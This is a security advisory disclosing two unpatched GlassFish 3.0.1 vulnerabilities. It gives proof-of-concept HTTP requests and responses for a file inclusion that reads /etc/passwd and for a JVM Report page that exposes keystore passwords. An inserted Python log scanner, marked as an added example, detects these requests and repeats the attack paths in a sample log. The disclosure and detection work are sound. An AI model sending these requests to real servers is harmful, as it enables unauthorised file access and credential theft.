Trustwave SpiderLabs Security Advisory TWSL2016-011:
Multiple Vulnerabilities in Oracle GlassFish Server Open Source Edition 3.0.1

Published: 06/08/2016
Version: 1.0

Vendor: Oracle Corporation
Product: GlassFish Server Open Source Edition
Version affected: 3.0.1 (build 22)

Product description:
GlassFish Server 3.0.1 is built on a modular, flexible runtime based on the OSGi standard. It enables organizations to create and deploy Web applications with the lightweight Java EE 6 Web Profile and to easily leverage the power of the full Java EE 6 platform for enterprise applications. Developers also benefit from the simplified programming model and productivity improvements offered by Java EE 6. The result is a flexible platform that can apply only what is needed to address the business problem, thereby reducing cost and complexity. Because GlassFish Server 3.0.1 uses a microkernel architecture based on OSGi, developers can begin with the Java EE 6 Web Profile and use the Update Center to dynamically upgrade to the full Java EE 6 platform.

Finding 1: Local File Inclusion
Credit: Piotr Karolak of Trustwave's SpiderLabs

A vulnerability in GlassFish Server Open Source Edition 3.0.1 (build 22) makes it possible to include arbitrary files on the server. This vulnerability can be exploited without any prior authentication.
The following PoC (Proof of Concept) demonstrates the vulnerability:

REQUEST
=======

GET /resource/file%3a///etc/passwd/ HTTP/1.1
Host: a.b.c.d:4848
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

RESPONSE
========

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish Server Open Source Edition 3.0.1
X-Powered-By: JSF/2.0
Last-Modified: Tue, 05 Jan 2016 08:12:11 GMT
Expires: Mon, 25 Jan 2016 10:33:19 GMT
Content-Type: application/octet-stream
Content-Length: 2243
Date: Tue, 05 Jan 2016 15:55:31 GMT
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
TRUNCATED
glassfish:x:120:65534::/home/glassfish:/bin/bash

Finding 2: Java Key Store Password Disclosure
Credit: Piotr Karolak of Trustwave's SpiderLabs

This vulnerability could allow an unauthenticated, remote attacker to obtain administratively privileged access to the web interface of the affected device. An attacker could exploit this vulnerability by submitting a TRACE method request. Successful exploitation of this vulnerability could provide an unauthenticated attacker with the plain-text password of an administrative user and grant access to the web-based administration interface. For an authenticated user, an HTTP GET request to the JVM Report page discloses the Java Key Store password of the Admin Console, which can help launch further attacks on the affected system.
The following PoC (Proof of Concept) demonstrates the vulnerability:

REQUEST
=======

GET /common/appServer/jvmReport.jsf?pageTitle=JVM%20Report HTTP/1.0
Host: a.b.c.d:4848
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: appServerRegistrationRemindLaterCookie=true; JSESSIONID=355826450d198ee743cefd78558c; treeForm:tree-hi=
Connection: close
Cache-Control: max-age=0

RESPONSE
========

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish Server Open Source Edition 3.0.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 16:00:00 PST
X-Powered-By: JSF/2.0
Content-Type: text/html;charset=UTF-8
Date: Tue, 05 Jan 2016 20:32:52 GMT
Connection: close

JVM Report
TRUNCATED
java.vendor.url.bug =
java.version = 1.7.0_79
= mixed mode
= OpenJDK 64-Bit Server VM
= Java Virtual Machine Specification
java.vm.specification.vendor = Oracle Corporation
java.vm.specification.version = 1.7
java.vm.vendor = Oracle Corporation
java.vm.version = 24.79-b02
= /home/glassfish/glassfish/domains/domain1/config/keystore.jks
= MY-ADMIN-PASSSWORD
= /home/glassfish/glassfish/domains/domain1/config/cacerts.jks
= MY-ADMIN-PASSSWORD
javax.rmi.CORBA.PortableRemoteObjectClass =

Remediation Steps:
No official fix is available. However, administrators can mitigate these findings with technologies such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often, Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the presence of Local File Inclusion vulnerabilities and other software weaknesses.

Revision History:
01/07/2016 - Vulnerability disclosed to vendor
04/06/2016 - Exceeded 90 days after date of contact to release a patch
06/01/2016 - Vendor acknowledges findings are not addressed and closes ticket
06/08/2016 - Advisory published

References
1.
2.
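The Remediation Steps above point at WAF/IDS detection as the only available mitigation. The script below is an added example (not part of the Trustwave advisory and not GlassFish code) showing what such a detection rule looks like when run over admin-listener access logs: it percent-decodes each request path repeatedly (so a double-encoded "%253a" is not missed), flags "/resource/" requests whose decoded path carries a URL scheme such as "file:" or a traversal segment (Finding 1), and flags any hit on the JVM Report page "/common/appServer/jvmReport.jsf" (Finding 2). The log lines, IP addresses and timestamps are constructed; the rule names are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format) for the GlassFish
# admin listener on port 4848. These are not from the original advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2016:15:55:31 +0000] "GET /resource/file%3a///etc/passwd/ HTTP/1.1" 200 2243
10.0.0.5 - - [05/Jan/2016:15:56:02 +0000] "GET /resource/file%253a///etc/hosts/ HTTP/1.1" 200 410
10.0.0.9 - - [05/Jan/2016:20:32:52 +0000] "GET /common/appServer/jvmReport.jsf?pageTitle=JVM%20Report HTTP/1.0" 200 18042
10.0.0.7 - - [05/Jan/2016:20:40:11 +0000] "GET /common/index.jsf HTTP/1.1" 200 5120
10.0.0.7 - - [05/Jan/2016:20:41:15 +0000] "GET /resource/images/logo.png HTTP/1.1" 200 3312
"""

# Minimal combined-log-format parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A "/resource/" path followed by a URL scheme (file:, jar:, ...) rather than a
# plain file name is the Finding 1 indicator from the advisory's PoC request.
SCHEME_AFTER_RESOURCE_RE = re.compile(r'^/resource/[a-z][a-z0-9+.\-]*:', re.IGNORECASE)

JVM_REPORT_PATH = '/common/appServer/jvmReport.jsf'  # Finding 2 page


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so that
    double-encoded separators such as %253a (-> %3a -> ':') are normalised
    before matching. A WAF that decodes only once would miss that variant."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(path: str):
    """Return a rule tag for a suspicious request path, or None if benign.
    Rule names are placeholders chosen for this example."""
    decoded = fully_decode(path)
    no_query = decoded.split('?', 1)[0]
    if SCHEME_AFTER_RESOURCE_RE.search(no_query) or '/../' in no_query:
        return 'TWSL2016-011-F1 resource-path-url-scheme'
    if no_query.endswith(JVM_REPORT_PATH):
        return 'TWSL2016-011-F2 jvm-report-access'
    return None


def scan_log(text: str):
    """Run the two rules over every parseable log line; return alert dicts."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scanner
        tag = classify(m.group('path'))
        if tag:
            alerts.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'path': m.group('path'),
                'status': int(m.group('status')),
                'rule': tag,
            })
    return alerts


if __name__ == '__main__':
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} {a['status']} {a['rule']} {a['path']}")
```

On the sample input the scanner raises three alerts: the two "/resource/file:" requests (the second only because of the repeated decoding) and the JVM Report hit. The Finding 2 rule is an audit signal rather than a block: administrators legitimately open that page, so the useful follow-up is to confirm the source IP and session belong to an expected operator and, given that the page prints the keystore password, to rotate that password after any unexplained access. A 200 status on a Finding 1 alert means the file contents were actually returned, which is why the status is carried in the alert.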
About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.